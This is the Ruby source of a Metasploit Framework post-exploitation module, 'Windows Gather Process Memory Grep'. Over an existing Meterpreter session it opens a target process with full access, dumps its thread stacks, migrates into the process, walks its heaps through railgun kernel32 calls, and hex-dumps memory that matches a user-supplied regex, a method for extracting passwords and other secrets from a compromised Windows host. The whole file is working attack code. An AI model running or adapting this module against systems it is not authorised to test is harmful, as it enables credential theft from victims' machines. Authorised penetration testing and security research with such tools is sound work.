metasploit-framework/modules/post/windows/gather/memory_grep.rb

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##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Post
def initialize(info={})
super( update_info(info,
'Name' => 'Windows Gather Process Memory Grep',
'Description' => %q{
This module allows for searching the memory space of a proccess for potentially sensitive
data.
},
'License' => MSF_LICENSE,
'Author' => ['bannedit'],
'Platform' => ['win'],
'SessionTypes' => ['meterpreter' ]
))
register_options([
OptString.new('PROCESS', [true, 'Name of the process to dump memory from', nil]),
OptString.new('REGEX', [true, 'Regular expression to search for with in memory', nil]),
], self.class)
end
def run
if session.type != "meterpreter"
print_error "Only meterpreter sessions are supported by this post module"
return
end
print_status("Running module against #{sysinfo['Computer']}")
target_pid = nil
stack = []
name = datastore['PROCESS']
regex = Regexp.new(datastore['REGEX'])
target_pid = client.sys.process[name]
print_status("Found #{datastore['PROCESS']} running as pid: #{target_pid}")
if not target_pid
print_error("Could not access the target process")
return
end
process = session.sys.process.open(target_pid, PROCESS_ALL_ACCESS)
begin
print_status("Walking process threads...")
threads = process.thread.each_thread do |tid|
thread = process.thread.open(tid)
esp = thread.query_regs['esp']
addr = process.memory.query(esp)
vprint_status("Found Thread TID: #{tid}\tBaseAddress: 0x%08x\t\tRegionSize: %d bytes" % [addr['BaseAddress'], addr['RegionSize']])
data = process.memory.read(addr['BaseAddress'], addr['RegionSize'])
stack << {
'Address' => addr['BaseAddress'],
'Size' => addr['RegionSize'],
'Handle' => thread.handle,
'Data' => data
}
end
rescue
end
# we need to be inside the process to walk the heap using railgun
current = session.sys.process.getpid
if target_pid != current
print_status("Migrating into #{target_pid} to allow for dumping heap data")
session.core.migrate(target_pid)
end
heap = []
railgun = session.railgun
heap_cnt = railgun.kernel32.GetProcessHeaps(nil, nil)['return']
dheap = railgun.kernel32.GetProcessHeap()['return']
vprint_status("Default Process Heap: 0x%08x" % dheap)
ret = railgun.kernel32.GetProcessHeaps(heap_cnt, heap_cnt * 4)
pheaps = ret['ProcessHeaps']
idx = 0
handles = []
while idx != pheaps.length
vprint_status("Found Heap: 0x%08x" % pheaps[idx, 4].unpack('V')[0])
handles << pheaps[idx, 4].unpack('V')[0]
idx += 4
end
print_status("Walking the heap... this could take some time")
begin
heap = []
handles.each do |handle|
lpentry = "\x00" * 42
while (ret = railgun.kernel32.HeapWalk(handle, lpentry)) and ret['return']
#print ret.inspect
entry = ret['lpEntry'][0, 4].unpack('V')[0]
size = ret['lpEntry'][4, 4].unpack('V')[0]
data = process.memory.read(entry, size)
vprint_status("Walking Entry: 0x%08x\t Size: %d" % [entry, size])
heap << {'Address' => entry, 'Size' => size, 'Handle' => handle, 'Data' => data}
lpentry = ret['lpEntry']
end
end
rescue
end
matches = []
stack.each do |mem|
idx = mem['Data'].index(regex)
if idx != nil
print_status("Match found...\n" + hex_dump(mem['Data'][idx, 512], mem['Address']+idx))
end
end
heap.each do |mem|
idx = mem['Data'].index(regex)
if idx != nil
print_status("Match found...\n" + hex_dump(mem['Data'][idx, 512], mem['Address']+idx))
end
end
end
def hex_dump(str, base = 0, width = 16)
buf = ''
idx = 0
cnt = 0
snl = false
lst = 0
while (idx < str.length)
chunk = str[idx, width]
addr = "0x%08x:\t" % (base + idx)
line = chunk.unpack("H*")[0].scan(/../).join(" ")
buf << addr + line # add the index to the beginning of the line (base + idx)
if (lst == 0)
lst = line.length
buf << " " * 4
else
buf << " " * ((lst - line.length) + 4).abs
end
chunk.unpack("C*").each do |c|
if (c > 0x1f and c < 0x7f)
buf << c.chr
else
buf << "."
end
end
buf << "\n"
idx += width
end
buf << "\n"
end
end